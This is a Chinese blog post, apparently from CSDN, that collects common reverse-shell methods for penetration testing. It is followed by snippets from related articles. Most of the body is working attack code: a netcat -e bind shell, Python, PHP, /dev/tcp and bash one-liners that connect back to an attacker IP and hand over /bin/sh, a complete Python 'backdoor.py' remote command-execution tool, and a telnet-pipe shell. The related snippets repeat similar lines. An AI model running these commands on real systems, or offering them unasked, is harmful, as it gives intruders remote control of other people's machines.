常用的反弹shell总结

最新推荐文章于 2025-03-13 17:37:44 发布
最新推荐文章于 2025-03-13 17:37:44 发布
阅读量1.6k 收藏 3
点赞数 1
分类专栏: web 文章标签: shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45089570/article/details/105077414
版权
本文详细介绍如何使用nc、python、php等工具实现反弹shell,包括安装nc完整版、使用nc监听及发布bash、python脚本获取shell、php反弹shell等方法,为渗透测试提供多种远程控制手段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

nc反弹shell

我们已经拿下主机的一个webshell,我们想获取一个可以直接操作主机的虚拟终端,此时我们首先想到的是开启一个shell监听,这种场景比较简单,我们直接使用使用nc即可开启,如果没有nc我们也可以很轻松的直接下载安装一个,具体开启监听的命令如下。

这里需要注意一点默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接发布与反弹本地shell的功能参数 -e这里都被阉割了,所以我们需要手动下载二进制安装包,自己动手丰衣足食了,具体过程如下。

安装nc完整版

# 第一步:下载二进制netc安装包
root@home-pc# wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz 
# 第二步:解压安装包
root@home-pc# tar -xvzf netcat-0.7.1.tar.gz
# 第三步:编译安装
root@home-pc# ./configure
root@home-pc# make
root@home-pc# make install
root@home-pc# make clean
# 具体编译安装过程可以直接参见INSTALL安装说明文件内容...
# 第四步:在当前目录下运行nc帮助
root@home-pc:/tmp/netcat-0.7.1# nc -h
GNU netcat 0.7.1, a rewrite of the famous networking tool.
Basic usages:
connect to somewhere:  nc [options] hostname port [port] ...
listen for inbound:    nc -l -p port [options] [hostname] [port] ...
tunnel to somewhere:   nc -L hostname:port -p port [options]
Mandatory arguments to long options are mandatory for short options too.
Options:
-c, --close                close connection on EOF from stdin
-e, --exec=PROGRAM         program to exec after connect
-g, --gateway=LIST         source-routing hop point[s], up to 8
-G, --pointer=NUM          source-routing pointer: 4, 8, 12, ...
-h, --help                 display this help and exit
-i, --interval=SECS        delay interval for lines sent, ports scanned
-l, --listen               listen mode, for inbound connects
-L, --tunnel=ADDRESS:PORT  forward local port to remote address
-n, --dont-resolve         numeric-only IP addresses, no DNS
-o, --output=FILE          output hexdump traffic to FILE (implies -x)
-p, --local-port=NUM       local port number
-r, --randomize            randomize local and remote ports
-s, --source=ADDRESS       local source address (ip or hostname)
-t, --tcp                  TCP mode (default)
-T, --telnet               answer using TELNET negotiation
-u, --udp                  UDP mode
-v, --verbose              verbose (use twice to be more verbose)
-V, --version              output version information and exit
-x, --hexdump              hexdump incoming and outgoing traffic
-w, --wait=SECS            timeout for connects and final net reads
-z, --zero                 zero-I/O mode (used for scanning)
Remote port number can also be specified as range.  Example: '1-1024'

至此我们已经安装完成原生版本的 netcat工具,有了netcat -e参数,我们就可以将本地bash完整发布到外网了。

测试

开启本地8080端口监听,并将本地的bash发布出去。

root# nc -lvvp 8080 -t -e /bin/bash

另外一台目标机连接到这台靶机的8080端口

nc [靶机ip] 8080
在这里插入图片描述

python反弹shell

在渗透机上执行监听端口的命令:

nc -lvp 1234

在靶机上执行如下命令:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.105",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

使用python脚本来获取shell

# 1.编写usage函数
# 2.利用getopt模块从命令行获取参数值
# 3.区分客户端和服务端
# 4. 定义客户端代码,发送服务端命令行的回显内容
# 5. 定义服务端代码,接收命令,发动执行命令后的结果给客户端
# 6. 定义命令执行函数,执行客户端发送的命令
import socket
import getopt #该模块用来获取命令行模块
import sys
import subprocess
from threading import Thread
def main():
    target=""
    port =0
    listen =False
    help = False
    # 2. 利用getopt模块从命令行获取参数值
    opts,args =getopt.getopt(sys.argv[1:],"t:p:hl")
    for o,a in opts:
        if o=="-t":
            target=a
        elif o=="-p":
            port=int(a)
        elif o=="-h":
            help=True
        elif o=="-l":
            listen=True
    if help:
        usage()
    # 3.区分客户端和服务端
    elif not listen:
        client_handle(target,port)
    else:
        server_handle(port)
# 4.定义客户端代码,发送命令,接收服务端命令行的回显内容
def client_handle(target,port):
    client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    client.connect((target,port))
    while True:
        recv_len=1
        response="".encode("utf-8")
        while recv_len:
            data=client.recv(4096)
            recv_len=len(data)
            response+=data
            if recv_len<4096:
                break
        print(response.decode('gbk'),end="")

        # 接收命令
        buffer = input("") # str 我们输入的是字符串内容
        buffer+="\n"
        client.send(buffer.encode('utf-8')) #转化为bytes类型用于传输

# 5. 定义服务端代码,接收命令,发送执行命令后的结果给客户端

def server_handle(port):
    server =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    server.bind(('0.0.0.0',port))
    server.listen(10) #定义监听的数量
    print("[*] Listening on 0.0.0.0: %d" % port)
    while True:
        client_socket,addr=server.accept()
        print("[*] Accept connection from %s:%d" % (addr[0],addr[1]))
        t=Thread(target=run_command,args=(client_socket,))
        t.start()
# 6.定义命令执行函数,执行客户端发送的命令
def run_command(client_socket):
    while True:
        client_socket.send(b"shell_>")
        cmd_buffer="".encode('utf-8') #bytes
        while b"\n" not in cmd_buffer:
            cmd_buffer+=client_socket.recv(1024)
        cmd_buffer = cmd_buffer.decode() # str
        try:
            out=subprocess.check_output(cmd_buffer,stderr=subprocess.STDOUT,shell=True)
            client_socket.send(out)
        except:
            client_socket.send(b"Failed to execute command.\r\n") #发送执行命令错误的信息



# 1.编写usage函数
def usage():
    print("help info:python backdoor.py -h")
    print("client: python backdoor.py -t [target] -p [port]")
    print("server: python backdoor.py -lp [port]")
    sys.exit()
if __name__=="__main__":
    main()

可以先放在自己的服务器里,然后再用wget下载

靶机执行:

python3 backdoor.py -lp 9999         # 进行监听端口

渗透机执行

python3 backdoor.py -t [靶机ip]  -p 9999

在这里插入图片描述

将shell转化为交互的tty;

python -c 'import pty;pty.spawn("/bin/bash")'

sh-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
[tom@redhat tmp]$ whoami 
whoami
tom
[tom@redhat tmp]$

php反弹shell

php -r '$sock=fsockopen("192.168.11.101",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$

这个我暂时没有实验成功好像需要配置一些php的参数…

exec反弹

kevin@ubuntu:~$ exec 5<>/dev/tcp/192.168.11.101/4444
kevin@ubuntu:~$ cat <&5 | while read line; do $line 2>&5 >&5; done

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$

在这里插入图片描述在这里插入图片描述

第二种方式:

kevin@ubuntu:~$ 0<&196;exec 196<>/dev/tcp/192.168.11.101/4444; sh <&196>&196 2>&196

# 返回的是原始shell
root@kali:~# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.10.166] from (UNKNOWN) [10.10.10.50] 39740
$

bash反弹shell

bash -i >& /dev/tcp/192.168.11.101/44440>&1     #靶机

# 返回的执行命令所在的用户 shell 环境
root@kali:~# nc -nvlp 4444  		#渗透机监听端口
listening on [any] 4444 ...
Connection from 192.168.11.105:47430
fyz@ubuntu:~$

在这里插入图片描述在这里插入图片描述

telnet反弹

在攻击主机上打开两个终端分别监听 1234 和 4321端口,(确保端口开放,并且不被占用),得到反弹shell后,1234 终端 输入命令, 4321 终端就会获得执行相应命令后的结果:

nc -lvvp 1234

nc -lvvp 4321

在目标主机上执行:

telnet 攻击主机ip 1234 | /bin/bash | telnet 攻击主机ip 4321

额,这个我好像也没试成功改天找找原因。。。

参考文章:
https://blog.csdn.net/qiuyeyijian/article/details/102993592?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task
https://zhuanlan.zhihu.com/p/30170345?from_voters_page=true
https://blog.csdn.net/qq_38684504/article/details/90047213

Linux反弹shell
谢公子的博客
11-29 9602
目录 Bash反弹shell Python反弹shell 其他命令反弹shell 写入命令到定时任务文件 写入SSH公钥 写入/etc/profile文件 当我们可以在远程Linux主机上执行任意命令或写入任意数据到任意文件的时候,我们通常会通过以下方式控制远程主机。 Bash反弹shell Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,...
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4927
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
反弹Shell总结
code_lab
09-05 824
jsp shell<%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("shell"); //获取参数 Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStre
【渗透测试】反弹 Shell 技术详解(二)
最新发布
SunnyCat
03-13 686
通过伪终端中转与通过管道等中转原理一样,但通过伪终端中转的检测难度大大提升,单从Shell的标准输入输出来看,和正常打开的终端没有什么区别。通过跟踪FD(文件描述符File Descriptor)和进程的关系可以检测该数据通道,判断是否为bash进程,获取bash父进程的/proc/[pid]/fd,判断是否有存在fd重定向到pipe或者socket情况。:这类反弹Shell的检测可以通过检测Shell的标准输入、标准输出是否被重定向到Socket或检测一些简单的主机网络日志特征来实现。
反弹shell汇总(超详细)
人无名,便可潜心练剑。
05-27 1万+
反弹shell姿势大全,看这一篇就够啦~
部分常用反弹shell总结
来到了学渣的博客
02-21 487
为什么要使用反向 Shell 目标机器在一个不同(相对攻击者而言)的私有网络 目标机器的防火墙阻挡了所有入口连接(这种情况正向 Shell 是会被防火墙阻挡的) 由于一些原因,你的 Payload 不能绑定在应该绑定的端口的时候 你还不能确定应该选择反向 Shell 还是正向 Shell 的时候 监听端IP:192.168.0.99 Python 靶机端 python -c 'import s...
干货分享—Linux之渗透测试常用反弹shell方法总结!黑客技术零基础入门到精通实战教程!
白帽阿叁的博客
01-08 970
反弹shell主要就是让我们能远程连接到目标控制台并且下达指令,来达到操控目标资产的目的!正向反弹: 控制端(也就是我们自己的机器)发送请求去连接被控端(目标机器)的方式。不过这种方式会受到防火墙,路由,等各种很多因素影响,很难成功。反向反弹: 被控端主动发送请求连接我们的控制端。这种方法是可以办法避开防火墙和路由的一些限制的!
常用的一句话反弹shell总结
热门推荐
橘子女侠
05-20 1万+
目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1549
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 903
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
反弹shell总结
weixin_54626591的博客
08-31 1772
反弹shell总结
反弹shell的本质及实战
静水流深,沧笙踏歌
05-13 436
Linux反弹shell(一)文件描述符与重定向 Linux 反弹shell(二)反弹shell的本质 Linux下反弹shell几种方法学习总结
渗透测试--反弹shell(1)
weixin_43520214的博客
09-18 1193
反弹shell(Reverse Shell)是一种计算机安全领域的术语,通常出现在讨论网络安全、渗透测试或黑客攻防技术时。它指的是这样一种情况:攻击者首先在自己的机器上监听某个特定的网络端口,然后通过某种手段(例如利用软件漏洞)在目标系统上执行一段代码,这段代码会让目标系统主动连接回攻击者的机器。一旦建立了这个连接,攻击者就可以通过这个连接对目标系统发送命令并接收其输出,从而达到远程控制目标系统的目的。反弹shell与普通(正向)shell的主要区别在于连接的方向。
反弹shell的几种方法
星河梦瑾的博客
09-19 1280
目标服务器系统:Ubuntu、CentOS。 攻击者系统:Kali Linux,IP地址为 192.168.0.1,开放 4444 端口。 反弹Shell: 正向反弹Shell:目标机先执行 nc -lvp 4444 -e /bin/bash,然后攻击者使用 nc ip 4444 监听,可以实现Shell反弹。 反向反弹Shell:有多种方法,包括使用 bash、python、nc 本身,以及 php 来实现。每种方法都需要在攻击者机器上先使用 nc -lvp 端口号 进行监听
python反弹shell_反弹shell的几种方式总结
weixin_34653651的博客
01-15 4790
假设本机地址10.10.10.11,监听端口443。1、Bash环境下反弹TCP协议shell首先在本地监听TCP协议443端口nc-lvp443然后在靶机上执行如下命令:bash-i>&/dev/tcp/10.10.10.11/4430>&1/bin/bash-i>/dev/tcp/10.10.10.11/4430&1exec5&l...
Linux常用反弹shell命令
m0_63200360的博客
04-24 3767
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
linux反弹shell方法
weixin_53747497的博客
07-12 2357
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
shell 函数return 返回值与echo内容的获取
小猪佩奇工作室
02-27 3454
写了个shell函数 调用完之后不知道怎么获取返回值,于是乎用上了 $(func_name) 来获取,然后踩了几个坑 查看教程之后发现要用 $? 来获取刚刚执行的函数的返回值, function func1() { echo 1 return 2 echo 3 } res=$(func1) echo $res 输出结果为 1 function func1() { echo 1 return 2 echo 3 } func1 echo $? res=$? echo $res 输出结果为
url反弹shell
08-13
反弹shell是一种通过利用漏洞或特定的脚本来建立网络连接并获取远程控制权限的技术。具体来说,反弹shell可以用于从目标服务器或计算机向攻击者的机器发送命令和控制指令。在这里,你提到了通过URL来实现反弹shell的问题。 根据你提供的引用内容,有几种方法可以使用URL来实现反弹shell。其中一种方法是使用nc命令和-e参数来反弹shell。在Linux中,可以使用以下命令: ```bash nc -e /bin/bash 1.1.1.1 9999 ``` 这将在目标服务器上执行/bin/bash,<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [内网渗透-常用反弹shell方法总结](https://blog.csdn.net/lza20001103/article/details/126558175)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值